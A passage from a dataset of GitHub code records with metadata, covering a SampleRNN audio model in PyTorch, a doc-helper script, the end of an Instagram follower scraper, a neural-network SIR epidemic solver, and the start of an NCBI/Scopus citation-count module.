last_index:last_index + 7] = input_conds[:, :, 34:41]\n last_index += 7\n\n input_conds_aux[:, :, last_index:last_index + 7] = input_conds[:, :, 42:49]\n last_index += 7\n\n input_conds_aux[:, :, last_index:] = input_conds[:, :, 50:]\n\n # Move to CUDA if required\n if input_conds.is_cuda:\n input_conds_aux = input_conds_aux.cuda()\n\n # Return it\n return input_conds_aux\n\n def forward(self, utterance_samples, speaker_conds, utterance_conds, utterances_reset):\n\n # Get basic Parameters\n batch_size, time_steps, _ = utterance_conds.shape\n\n # Initialize Hidden States Dict\n if self.frame_level_hidden_states is None:\n self.frame_level_hidden_states = {\n rnn: [None] * utterance_conds.shape[0] for rnn in self.frame_level_layers\n }\n\n # Check that there are valid samples to propagate\n if not any(utterances_reset != 2):\n return_tensor = torch.zeros(\n utterance_samples.shape[0],\n self.conf.architecture['receptive_field'],\n self.quantizer.q_levels\n )\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n return return_tensor\n\n # Clean the inputs\n else:\n utterance_samples = utterance_samples[utterances_reset != 2] if utterance_samples is not None else None\n utterance_conds = utterance_conds[utterances_reset != 2]\n speaker_conds = speaker_conds[utterances_reset != 2]\n\n # Check if we are dealing with linguistic conditionants to apply the embeddings\n if self.conf.conditionants['utterance_type'] in ['linguistic', 'linguistic_lf0']:\n utterance_conds = self._format_linguistic_features(utterance_conds)\n\n # Prepare Conds\n speaker_conds = speaker_conds.unsqueeze(1).expand(utterance_conds.shape[0], time_steps, -1)\n\n # Apply Linear transformation to the input conds\n input_conds = self._conds_adaptation_layer(torch.cat((utterance_conds, speaker_conds), dim=2))\n\n # Training Mode\n if self.training:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['receptive_field'], self.quantizer.q_levels)\n\n # Move to CUDA if required\n if utterance_samples.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_train(\n input_samples=utterance_samples,\n input_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :, :] = model_output[last_index, :, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n # Inference Mode\n else:\n\n # Create holder of the result\n return_tensor = torch.zeros(batch_size, self.conf.architecture['frame_size'] + time_steps *\n self.conf.architecture['frame_size'])\n\n # Move to CUDA if required\n if utterance_conds.is_cuda:\n return_tensor = return_tensor.cuda()\n\n # Get the model output\n model_output = self.do_infer(\n utterances_conds=input_conds,\n utterances_reset=utterances_reset\n )\n\n # Store the result in the appropiate positions\n last_index = 0\n for reset_index, reset_item in enumerate(utterances_reset):\n if reset_item != 2:\n return_tensor[reset_index, :] = model_output[last_index, :]\n last_index += 1\n\n # Return the torch.Tensor\n return return_tensor\n\n def do_train(self, input_samples, input_conds, utterances_reset):\n\n # Get batch_size\n (batch_size, _) = input_samples.size()\n\n # Initialize upper level conditioners\n upper_tier_conditioning = None\n\n # Iterate over the list of sample level layers\n for frame_level_layer in reversed(self.frame_level_layers):\n # Compute samples to pass in current frame level layer\n from_index = self.frame_level_layers[-1].frame_input_samples - frame_level_layer.frame_input_samples\n to_index = -frame_level_layer.frame_input_samples + 1\n\n # Quantize the samples\n frame_layer_input_samples = self.quantizer.dequantize(input_samples[:, from_index: to_index])\n\n # Reshape samples to (batch_size, seq_len, frame_level_fs)\n frame_layer_input_samples = frame_layer_input_samples.contiguous() \\\n .view(batch_size, -1, frame_level_layer.frame_input_samples)\n\n # Get next frame level hidden state\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n (upper_tier_conditioning, new_hidden) = frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Store new hidden state in the dictionary\n self._set_frame_level_hidden_states(new_hidden.detach(), frame_level_layer, utterances_reset)\n\n # Get sample level input\n sample_layer_input_samples = input_samples[:, (self.frame_level_layers[-1].frame_input_samples -\n self.sample_level_layer.frame_input_samples):]\n\n # Propagate through sample level layer and return the result\n return self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=input_conds,\n upper_tier_conditioning=upper_tier_conditioning\n )\n\n def do_infer(self, utterances_conds, utterances_reset):\n # Get batch_size\n (batch_size, num_portions, conds_size) = utterances_conds.size()\n\n # Create a Tensor to store the generated samples in\n generated_sequences = torch.zeros(\n batch_size,\n self.conf.architecture['frame_size'] + num_portions * self.conf.architecture['frame_size'],\n dtype=torch.int64\n ).fill_(self.quantizer.quantize_zero())\n\n # Move to CUDA\n if utterances_conds.is_cuda:\n generated_sequences = generated_sequences.cuda()\n\n # Create a list to store the conditioning\n frame_level_outputs = [None for _ in self.frame_level_layers]\n\n # Iterate over the samples\n for generated_sample in range(self.conf.architecture['frame_size'], generated_sequences.shape[1]):\n # Compute conds index\n conds_indx, _ = divmod(generated_sample, self.conf.architecture['frame_size'])\n conds_indx -= 1\n\n # On\n if generated_sample == self.conf.architecture['frame_size'] + 1:\n utterances_reset[utterances_reset == 1] = 0\n\n # Iterate over Frame Level layers\n for (frame_level_indx, frame_level_layer) in reversed(list(enumerate(self.frame_level_layers))):\n\n # If the generated sample is not a multiple of the input size, skip\n if generated_sample % frame_level_layer.frame_input_samples != 0:\n continue\n\n # Prepare the input samples to enter the model\n frame_layer_input_samples = torch.autograd.Variable(self.quantizer.dequantize(\n generated_sequences[:, generated_sample - frame_level_layer.frame_input_samples:generated_sample]\n ).unsqueeze(1))\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n frame_layer_input_samples = frame_layer_input_samples.cuda()\n\n # Check if we have conditioning\n if frame_level_indx == len(self.frame_level_layers) - 1:\n upper_tier_conditioning = None\n\n # If we are not in the last tier\n else:\n\n # Compute frame_index\n frame_index = (generated_sample // frame_level_layer.frame_input_samples) % \\\n self.frame_level_layers[frame_level_indx + 1].frame_ratio\n\n # Get the upper tier conditioning from the previous upper tier\n upper_tier_conditioning = frame_level_outputs[frame_level_indx + 1][:, frame_index, :] \\\n .unsqueeze(1)\n\n # Set the new hidden states\n frame_level_hidden_state = self._get_frame_level_hidden_states(\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Propagate through current frame level layer\n frame_level_outputs[frame_level_indx], new_frame_level_hiddden_state = \\\n frame_level_layer(\n input_samples=frame_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning,\n rnn_hidden_state=frame_level_hidden_state\n )\n\n # Set the new frame level hidden state\n self._set_frame_level_hidden_states(\n new_hidden_state_tensor=new_frame_level_hiddden_state.detach(),\n frame_level_layer=frame_level_layer,\n reset_list=utterances_reset\n )\n\n # Prepare the input samples Sample Level Layer\n sample_layer_input_samples = \\\n generated_sequences[:, generated_sample - self.sample_level_layer.frame_input_samples:generated_sample]\n\n # Mode the variable to CUDA, if available\n if utterances_conds.is_cuda:\n sample_layer_input_samples = sample_layer_input_samples.cuda()\n\n # Prepare conditioning\n upper_tier_conditioning = frame_level_outputs[0][:, generated_sample % self.sample_level_layer\n .frame_input_samples, :].unsqueeze(1)\n\n # Store generated samples\n generated_sequences[:, generated_sample] = self.sample_level_layer(\n input_samples=sample_layer_input_samples,\n input_conds=utterances_conds[:, conds_indx, :].unsqueeze(1),\n upper_tier_conditioning=upper_tier_conditioning\n ).squeeze(1).exp_().multinomial(1).squeeze(1)\n\n # Return generated samples\n return generated_sequences\n", "repo_name": "entn-at/samplernn_pytorch", "sub_path": "samplernn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 32039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.nn.GRU", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.ConvTranspose1d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "attribute"}, {"api_name": "torch.nn.init.uniform_", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 102, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "attribute"}, {"api_name": "utils.concat_init", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.lecun_uniform", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 211, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 239, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv1d", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "attribute"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "attribute"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 270, "usage_type": "attribute"}, {"api_name": "torch.nn.init.constant_", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "utils.lecun_uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 281, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 329, "usage_type": "attribute"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 333, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 334, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 338, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 339, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 341, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 343, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 346, "usage_type": "name"}, {"api_name": "configuration.SampleRNNConfiguration", "line_number": 348, "usage_type": "name"}, {"api_name": "utils.SampleRNNQuantizer", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 363, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 367, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 561, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.int64", "line_number": 674, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 702, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 702, "usage_type": "attribute"}]} +{"seq_id": "12357506201", "text": "import importlib\nimport inspect\nimport os\nimport sys\n\nfrom collections import defaultdict\n\n\ndef make_replace_for_doc(text):\n for to_replace in REPLACE_TO_EMPTY_STR:\n text = text.replace(to_replace, '')\n\n return text\n\n\ndef make_replace_for_response_and_value(text):\n for to_replace in REPLACE_TO_LIST:\n text = text.replace(to_replace, 'list')\n\n for _from, to in REPLACE_TO_ANOTHER.items():\n text = text.replace(_from, to)\n\n return text\n\n\ndef make_replace_for_constant(text):\n text = str(text)\n if ' number_of_followers or math.fabs(next_length - number_of_followers) < 5:\r\n break\r\n\r\ncursor.close()\r\ncon.close()\r\nbrowser.close()\r\n\r\n\r\n", "repo_name": "IbragimovaS/Parser", "sub_path": "new_insta.py", "file_name": "new_insta.py", "file_ext": "py", "file_size_in_byte": 8811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.Session", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 66, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 88, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "ibm_db_dbi.connect", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 111, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 127, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 130, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 141, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 141, "usage_type": "call"}, {"api_name": "math.fabs", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "39292279938", "text": "from training import train\nfrom constants import ROOT_DIR\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import DataLoader\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom models import SIRNetwork\nfrom utils import SIR_solution\n\nif __name__ == '__main__':\n\n # Initial Conditions\n N = 1\n rescaling_factor = 1\n\n infected = 0.2\n susceptible = N - infected\n recovered = 0\n\n s_0 = susceptible / N * rescaling_factor\n i_0 = infected / N * rescaling_factor\n r_0 = 0\n\n # Equation parameters\n initial_conditions = [0, [s_0, i_0, r_0]]\n beta = round(0.8, 2)\n gamma = round(0.2, 2)\n\n # Sanity check\n assert i_0 + s_0 + r_0 == rescaling_factor\n\n # Model parameters\n t_final = 20\n train_size = 2500\n decay = 0.0\n hack_trivial = False\n epochs = 1000\n lr = 8e-4\n\n # Scipy solver solution\n t = np.linspace(0, t_final, t_final)\n s_p, i_p, r_p = SIR_solution(t, s_0, i_0, r_0, beta, gamma)\n\n # Init model\n sir = SIRNetwork(layers=2, hidden=50)\n\n try:\n # It tries to load the model, otherwise it trains it\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n except FileNotFoundError:\n # Train\n optimizer = torch.optim.Adam(sir.parameters(), lr=lr)\n writer = SummaryWriter(\n 'runs/' + 's_0={:.2f}-i_0={:.2f}-r_0={:.2f}-t_0={:.2f}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[\n 0],\n t_final, beta,\n gamma))\n sir, train_losses, run_time, optimizer = train(sir, initial_conditions, t_final=t_final, epochs=epochs,\n num_batches=10, hack_trivial=hack_trivial,\n train_size=train_size, optimizer=optimizer,\n decay=decay,\n writer=writer, beta=beta, gamma=gamma)\n # Save the model\n torch.save({'model_state_dict': sir.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()},\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final,\n beta,\n gamma))\n # Load the checkpoint\n checkpoint = torch.load(\n ROOT_DIR + '/models/SIR/s_0={:.2f}-i_0={:.2f}-r_0={:.2f}'\n '-t_0={}-t_f={:.2f}_beta={}_gamma={}.pt'.format(s_0,\n i_0, r_0,\n initial_conditions[0],\n t_final, beta,\n gamma))\n\n # Load the model\n sir.load_state_dict(checkpoint['model_state_dict'])\n\n # Test between 0 and t_final\n grid = torch.arange(0, t_final, out=torch.FloatTensor()).reshape(-1, 1)\n t_dl = DataLoader(dataset=grid, batch_size=1, shuffle=False)\n s_hat = []\n i_hat = []\n r_hat = []\n\n for i, t in enumerate(t_dl, 0):\n # Network solutions\n s, i, r = sir.parametric_solution(t, initial_conditions)\n s_hat.append(s.item())\n i_hat.append(i.item())\n r_hat.append(r.item())\n\n # Colors and Linewidth\n blue = '#3366ff'\n red = '#cc0000'\n green = '#13842e'\n linewidth = 1.5\n # Plot network solutions\n plt.figure(figsize=(12, 5))\n plt.plot(range(len(s_hat)), s_hat, label='Susceptible', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_hat)), i_hat, label='Infected', color=red, linewidth=linewidth)\n plt.plot(range(len(r_hat)), r_hat, label='Recovered', color=green, linewidth=linewidth)\n plt.plot(range(len(s_p)), s_p, label='Susceptible - Scipy', linestyle='--', color=blue, linewidth=linewidth)\n plt.plot(range(len(i_p)), i_p, label='Infected - Scipy', linestyle='--', color=red, linewidth=linewidth)\n plt.plot(range(len(r_p)), r_p, label='Recovered - Scipy', linestyle='--', color=green, linewidth=linewidth)\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.legend(loc='lower right')\n plt.xlabel('Time')\n plt.ylabel('S(t), I(t), R(t)')\n plt.savefig(\n ROOT_DIR + '/plots/SIR_s0={:.2f}_i0={:.2f}_r0={:.2f}_beta={}_gamma={}.png'.format(s_0, i_0, r_0, beta, gamma))\n plt.show()\n\n # Compute loss as a function of the time\n log_losses = []\n for i, t in enumerate(t_dl, 0):\n from losses import sir_loss\n\n t.requires_grad = True\n s, i, r = sir.parametric_solution(t, initial_conditions)\n t_loss = sir_loss(t, s, i, r, beta, gamma)\n log_losses.append(np.log(t_loss.item()))\n\n plt.figure(figsize=(15, 5))\n plt.plot(range(len(log_losses)), log_losses)\n plt.xlabel('Time')\n plt.ylabel('Logloss')\n plt.title('Solving SIR model with Beta = {} | Gamma = {} \\n'\n 'Starting conditions: S(0) = {:.2f} | I(0) = {:.2f} | R(0) = {:.2f} \\n'.format(beta, gamma, s_0, i_0, r_0))\n plt.show()\n", "repo_name": "tmscarla/improving-transfer-learning", "sub_path": "differential-equations/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.SIR_solution", "line_number": 43, "usage_type": "call"}, {"api_name": "models.SIRNetwork", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 60, "usage_type": "call"}, {"api_name": "training.train", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 73, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 83, "usage_type": "call"}, {"api_name": "constants.ROOT_DIR", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "constants.ROOT_DIR", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "losses.sir_loss", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "29232882305", "text": "#!/usr/bin/python3\n'''\nNew module, used for working with ncbi data.\n'''\nimport pandas as pd\nimport numpy as np\nimport requests\nimport os\nimport sys\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\ntry:\n API = os.environ['ELSKEY']\nexcept:\n print(\"Need to source the API keys!\")\n\ndef get_citedby(PMID):\n '''\n Get number of citations for an articles based on PMC code. Uses Elsevier API.\n '''\n try: \n scopus = requests.get('http://api.elsevier.com/content/search/scopus?query=PMID(%s)&field=citedby-count' % PMID, headers={'X-ELS-APIKEY':API})\n return scopus.json()['search-results']['entry'][0]['citedby-count']\n except Exception as e:\n print(e)\n return np.nan\n\ndef create_scopus_link(pmids):\n '''\n Creates a link to make a query about 25 articles (based on PMC codes).\n '''\n beg = 'http://api.elsevier.com/content/search/scopus?query=PMID(%s)' % pmids[0]\n final = [beg]\n end = '&field=citedby-count'\n for l in pmids[1:]:\n final.append('+OR+PMID(%s)' % l)\n return ''.join(final)\n\ndef 